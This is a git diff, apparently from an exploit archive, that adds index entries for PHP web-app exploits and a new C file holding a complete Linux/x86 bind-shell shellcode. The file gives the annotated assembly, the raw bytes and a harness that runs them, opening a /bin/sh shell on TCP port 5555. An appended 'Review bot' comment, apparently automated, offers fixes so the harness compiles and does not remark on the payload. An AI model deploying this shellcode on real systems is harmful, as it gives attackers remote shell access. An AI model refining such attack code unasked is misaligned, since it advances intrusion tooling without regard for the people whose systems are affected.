+44783,exploits/php/webapps/44783.txt,"DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
+44785,exploits/php/webapps/44785.txt,"Wordpress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,
+44786,exploits/php/webapps/44786.txt,"Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection",2018-05-28,L0RD,webapps,php,
+44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
+44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
+44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index d58ba033f..c113c01b0 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -887,3 +887,4 @@ id,file,description,date,author,type,platform
 44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86
 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
+44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44791.c b/shellcodes/linux_x86/44791.c
new file mode 100644
index 000000000..606ef5652
--- /dev/null
+++ b/shellcodes/linux_x86/44791.c
@@ -0,0 +1,120 @@
+#include
+#include
+
+/*
+
+; Bind TCP Shellcode
+; Copyright 2018, Luca Di Domenico
+;
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Title: Linux/x86 - TCP bind shell
+; Author: Luca Di Domenico
+; Website: https://thehackeradventure.com
+; Blog post: https://thehackeradventure.com/2018/05/17/assignement1/
+; Twitter: @sudo45
+; SLAE-ID: 1245
+
+global _start
+
+section .text
+_start:
+ xor eax, eax
+ xor ebx, ebx
+ xor ecx, ecx
+ xor edx, edx
+
+; socket()
+
+ push eax
+ mov al, 0x66
+ mov bl, 0x1
+ mov cl, 0x2
+ push ebx
+ push ecx
+ lea ecx, [esp]
+ int 0x80
+
+; bind()
+
+ pop ecx
+ pop ebx
+ push word 0xb315
+ push word cx
+ mov ecx, esp
+ mov dl, 0x10
+ push edx
+ push ecx
+ push eax
+ xchg eax, edx
+ mov al, 0x66
+ mov bl, 0x2
+ mov ecx, esp
+ int 0x80
+
+; listen()
+
+ push eax
+ push edx
+ mov al, 0x66
+ mov bl, 0x4
+ mov ecx, esp
+ mov edx, eax
+ int 0x80
+
+; accept()
+
+ xchg eax, edx
+ pop edi
+ push edx
+ push edi
+ inc ebx
+ mov ecx, esp
+ int 0x80
+ xchg ebx, eax
+ xor ecx, ecx
+ mov cl, 0x2
+
+_dup2_loop:
+
+ mov al, 0x3f
+ int 0x80
+ dec ecx
+ jns _dup2_loop
+
+; execve()
+
+ xor ecx, ecx
+ push ecx ; 0x00
+ push 0x68732f2f ; hs//
+ push 0x6e69622f ; nib/
+ mov ebx, esp
+ mov al, 0xb
+ int 0x80
+
+*/
+
+unsigned char code[] = \
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\xb0\x66\xb3\x01\xb1\x02\x53\x51\x8d\x0c\x24\xcd\x80\x59\x5b\x66\x68\x15\xb3\x66\x51\x89\xe1\xb2\x10\x52\x51\x50\x92\xb0\x66\xb3\x02\x89\xe1\xcd\x80\x50\x52\xb0\x66\xb3\x04\x89\xe1\x89\xc2\xcd\x80\x92\x5f\x52\x57\x43\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
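Review bot: The harness at the end of the hunk declares `main()` with an implicit `int` return type, which has been invalid since C99, and its `printf` passes the `size_t` result of `strlen(code)` to a `%d` conversion, a format/argument mismatch that `-Wformat` flags and the standard leaves undefined. Change the two lines to `int main(void)` and `printf("Shellcode Length: %zu\n", strlen(code));`, and add `return 0;` before the closing brace. The two `#include` directives at the top of the hunk have no header operand as rendered here; presumably `<stdio.h>` and `<string.h>` were stripped by the page rendering, but if the file was committed that way it does not compile, so confirm against the repository. Note also that `strlen` only reports the full length because the byte string as shown contains no `\x00`; a comment such as `/* strlen is valid only while the payload stays null-free */` would record that assumption next to the print.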